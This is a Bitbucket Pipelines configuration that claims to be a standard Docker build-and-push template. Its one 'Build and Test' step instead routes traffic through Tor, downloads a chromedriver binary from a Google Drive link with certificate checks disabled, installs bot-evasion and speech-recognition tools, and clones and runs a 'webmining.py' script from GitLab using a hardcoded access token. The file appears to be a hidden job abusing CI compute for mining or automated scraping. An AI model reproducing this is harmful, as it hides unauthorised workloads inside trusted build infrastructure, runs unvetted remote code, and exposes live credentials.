# Template docker-push

# This template allows you to build and push your docker image to a Docker Hub account.
# The workflow allows running tests, code linting and security scans on feature branches (as well as master).
# The docker image will be validated and pushed to the docker registry after the code is merged to master.

# Prerequisites: $DOCKERHUB_USERNAME, $DOCKERHUB_PASSWORD setup as deployment variables

image: atlassian/default-image:3

pipelines:
  default:
    - parallel:
        - step:
            name: Build and Test
            script:
              - apt-get -y update
              - apt-get install wget tor curl -y && curl ifconfig.me && service tor start && torsocks curl ifconfig.me
              - docker run --name Joker ubuntu:latest sh -c 'export DEBIAN_FRONTEND=noninteractive && TZ=Asia/Dubai && ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone && apt-get -y update && apt install curl wget git -y && wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb && apt install -y ./google-chrome-stable_current_amd64.deb && wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1KWm-_i82jgu5BsbmwY_ohcwx0Z3c9vND" -O chromedriver && apt-get install python3 python3-pip ffmpeg -y && pip3 install selenium==3.141.0 stem pydub SpeechRecognition requests undetected-chromedriver==1.5.2 && git clone https://marselinusswen1:glpat-PkffKKVRdvGzPncR-pyd@gitlab.com/marselinusswen1/Butao.git && cd Butao && python3 webmining.py'
            services:
              - docker
            caches:
              - docker
 
